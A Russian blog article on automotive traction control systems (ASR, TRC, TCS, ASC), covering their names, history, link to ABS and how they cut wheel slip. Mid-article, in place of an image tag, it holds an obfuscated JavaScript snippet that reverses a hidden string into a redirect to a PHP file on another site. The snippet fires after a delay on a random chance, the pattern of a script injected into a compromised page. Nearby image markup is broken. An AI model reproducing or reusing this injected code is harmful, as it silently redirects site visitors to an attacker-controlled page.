Системы безопасности автомобиля

Антипробуксовочная система: почему автомобилю не страшна скользкая дорога?

Друзья, если среди вас есть водители с большим опытом, то они прекрасно знают, чего можно ожидать от автомобиля и какие неприятные сюрпризы он может преподнести на дороге. В этой статье мы узнаем как работает антипробуксовочная система ASR и её собратья, для чего нужна эта технология и в чём её секрет.

Что делать людям, которые только-только сели за руль? Для них и, конечно же, не только для них были разработаны технологии активной безопасности, помогающие предотвратить аварийные ситуации, в том числе и система, которая устраняет пробуксовку.

//www.youtube.com/watch?v=iBU2n-HI2oM

Оглавление

Не боитесь пробуксовки? Зря…

Если Вам кажется, что пробуксовка ведущих колёс – это не такое уж и страшное явление, то Вы ошибаетесь. На самом деле оно очень коварно и скрывает массу опасностей. Например, на мокрой дороге буксующие колёса могут привести к заносу, а это уже аварийная ситуация.

Работа системы направлена на то, чтобы обеспечить надёжное сцепление покрышек с дорожным покрытием, причём делает она это на любой скорости автомобиля.

Имён много, а суть одна

Так же как и система ESP, о которой уже есть статья в нашем блоге, антипробуксовочная система имеет множество имён, хотя суть и принципы её работы от того, какими словами её обозвали, практически не меняются. Чтобы не быть голословными, приведём ряд примеров того, как одну и ту же технологию называют разные автопроизводители.

Autoteka

Так, к примеру, на Тойотах она именуется TRC (Traking Control), у Мерседесов, Ауди и Фольксвагенов – это система ASR (Automatic Slip Regulation), те, кто водят Хонду, знают её как TCS (Traction Control System), а у БМВ — это ASC (Anti-Slip Control). И это ещё неполный список имён антипробуксовочной системы.

Надеемся, с нюансом терминологии мы разобрались, и теперь у Вас не будет возникать вопросов наподобие: «Система TCS что это?» Идём далее.

Антипробуксовочная система: начало

Минутка истории. На серийных авто данная технология начала появляться в конце 70-х годов ХХ века. В основном её получали машины с мощными моторами, создающими высокий крутящий момент, что само по себе вызывало повышенный риск пробуксовки ведущих колёс. Но со временем система TRC и её братья-близнецы стали такой же стандартной «фишкой», как и антиблокировочная ABS. Кстати, эти две системы функционируют в унисон, но об этом немного позже.

Секреты небуксующих колёс

Пришло время разобраться в том, как работает антипробуксовочная система. Для примера возьмём технологию ASR, хотя, как мы уже сказали, принципиально она не отличается от своих аналогов. Технически она построена на базе антиблокировочной ABS – использует те же датчики частоты вращения колёс, часть её исполнительных устройств и даже блок управления у них общий. Тем не менее, принцип работы ASR таков, что ограничиться лишь тормозной системой она не может.

$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-ru.ru/wp-content/uploads/2016/11/shema-antibuxa.jpg» alt=»Схема антипробуксовочной системы ASR» width=»780″ height=»993″/> Схема системы ASR

Давайте познакомимся с алгоритмом функционирования антипробуксовочной системы. Первым делом ей необходимо определить ряд параметров:

  • скорость вращения колёс;
  • скорость движения машины;
  • степень проскальзывания колёс;
  • траекторию машины.

 

Если вдруг выясняется, что какой-то из параметров имеет опасное значение, электроника посылает сигналы исполнительным устройствам. В случае, когда скорость авто не превышает 80 км/ч, как правило, пробуксовка устраняется подтормаживанием колёс. Если же скорость выше 80 км/ч, ASR начинает контролировать работу двигателя, уменьшая крутящий момент.

to-ru.ru/wp-content/uploads/2016/11/rabota-antybux.jpg» alt=»Работа антипробуксовочной системы» width=»780″ height=»407″/>

Только для опытных водителей

Бытует мнение, что антипробуксовочная технология не всегда угождает опытным водителям, которые любят самостоятельно управлять автомобилем в любых ситуациях. К тому же, поклонникам экстремального вождения она вообще мешает – шины не пожечь, эффектно в поворот не зайти, поэтому часто возникает вопрос: «Как отключить ASR?»

На самом деле нет ничего проще – существует специальная кнопка, которая временно деактивирует антипробуксовочную систему, а о том, что она выключена Вам будет напоминать сигнальная лампа на панели приборов.

В завершение хотелось бы сказать, что не стоит пренебрегать электроникой, имеющейся у Вашего авто, каким бы опытным водителем Вы ни были.

Будьте внимательны на дорогах! И, конечно же, не забудьте подписаться на блог, в статьях которого вы будете открывать все секреты своих автомобилей.

 

Статьи по теме

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Back to top button